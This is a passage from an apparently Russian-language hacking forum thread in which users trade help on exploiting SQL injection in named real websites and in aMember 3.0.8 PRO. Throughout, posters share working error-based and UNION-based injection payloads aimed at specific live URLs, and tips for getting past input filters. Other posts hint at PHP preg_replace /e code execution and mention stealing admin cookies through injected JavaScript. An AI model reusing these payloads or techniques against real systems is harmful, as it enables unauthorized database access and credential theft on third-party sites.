Какой ахтунг. А кто будет указывать в функции модификатор? Like this - preg_replace("//e", "payload", NULL);
Есть слепая скуля и запрос вида 1'or(ExtractValue(1,concat(0x3a,(select(concat(table_schema,'.',table_name))from(information_schema.tables)where`table_name`like(0x25757365727325)and(data_length>0)))))=' ответ выдает ошибку syntax to use near ';0)))))='1' скуля не выполняется полностью из-за знака ">" в запросе, т.к. меняется на > и обваливается Вопрос: как правильно оформить или вернее можно ли поменять знак ">" ?
да об этом знаю. работает только ответ Subquery returns more than 1 row а как сделать на интервале 0..10 или like(0x25757365727325)and( data_length>0)and( data_length<10) или как узнать таблицы, в этом случае?
как можно раскрутить highlight.php ?? например http://www.itwire .com/plugins/system/highlight/highlight.php Уязвимость > http://1337day.com/exploit/description/20447 Хотя-бы намёк дайте,пожалуйста.
http://animemagazine.info/index.php?productID=1+order+by+4+--+ http://animemagazine.info/index.php?productID=-1+union+select+1,2,3,4+--+ Тело письма говорит <input type=hidden name=productID value="-45 union select 1,2,3,4 -- "> Как вывести принтабельные поля?
PHP: http://animemagazine.info/index.php?productID=1%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
по идее дописуют жс код, подкидуют ссылку на уязвимость админу чтобы своровать куки(не спрашивай как, а просто ЗАЙДИ В ГУГЛ И ПОСМОТРИ, ТАМ СТАТЕЙ НА ЭТУ ТЕМУ МИЛИОНЫ), но в 99 процентов случаях просто забивают и ничего не делают, потому что, то админки нету, то связатся с админом невозможно, и вобще это такой гемор который в 90% случаев того не стоит.
Всем привет! Подскажите можно из этого что нить извлечь PHP: http://mlw-cardon.ru/check?domain=1' Havij v1.16 - не может подцепиться А сам новичке не могу все время тот же результат
как минимум это раскрытие путей /home/users2/w/waf/domains/mlw-cardon.ru/ удаленный инклуд не просматривается, хотя и очевиден =( но есть скуля-буля там )) пиши мне в ПМ если хочешь узнать больше
фильтр таблицы привет всем ! нужна помощь в обходе фильтра на знак '_' уязвимый код PHP: list($y, $m) = split('_', $_GET['year_month']); $m = sprintf('%02d', $m); $dat1 = "{$y}-{$m}-01"; $dat2 = date('Y-m-t', strtotime($dat1)); ........... $q = $db->query("SELECT DAYOFMONTH(ac.date), COUNT(commission_id), SUM(IF(record_type='debit', amount, 0)), SUM(IF(record_type='credit', amount, 0)), SUM(IF(record_type='debit', 1, 0)) FROM {$db->config[prefix]}aff_commission ac WHERE aff_id=$member_id AND ac.date BETWEEN '$dat1' AND '$dat2' GROUP BY DAYOFMONTH(ac.date) "); ........... запрос который у меня вышел можно ли каким то образом обойти такой фильтр??? зашифровать? чтото типа Code: SELECT * FROM (SELECT 0x7461626c655f6e616d65) AS t2 да и к стати это уязвимость в aMember 3.0.8 PRO в фаиле aff.php
select login from member_admins select login from member%5fadmins select login from member%255fadmins
SQLMAP SQL-иньекция определила, что dbms - Microsoft Access! Но имя ее не может вытащить! Если пытаться посмотреть список таблиц то у всех название _fil! Кто сталкивался с такой проблемой? НУЖНА ПОМОЩЬ! Скрины прилагаются
тут это не поможет так %5f при обработке превращается в '_' и PHP: list($y, $m) = split('_', $vars['year_month']); его рубит надо ка кто выполнить запрос вообще без этого знака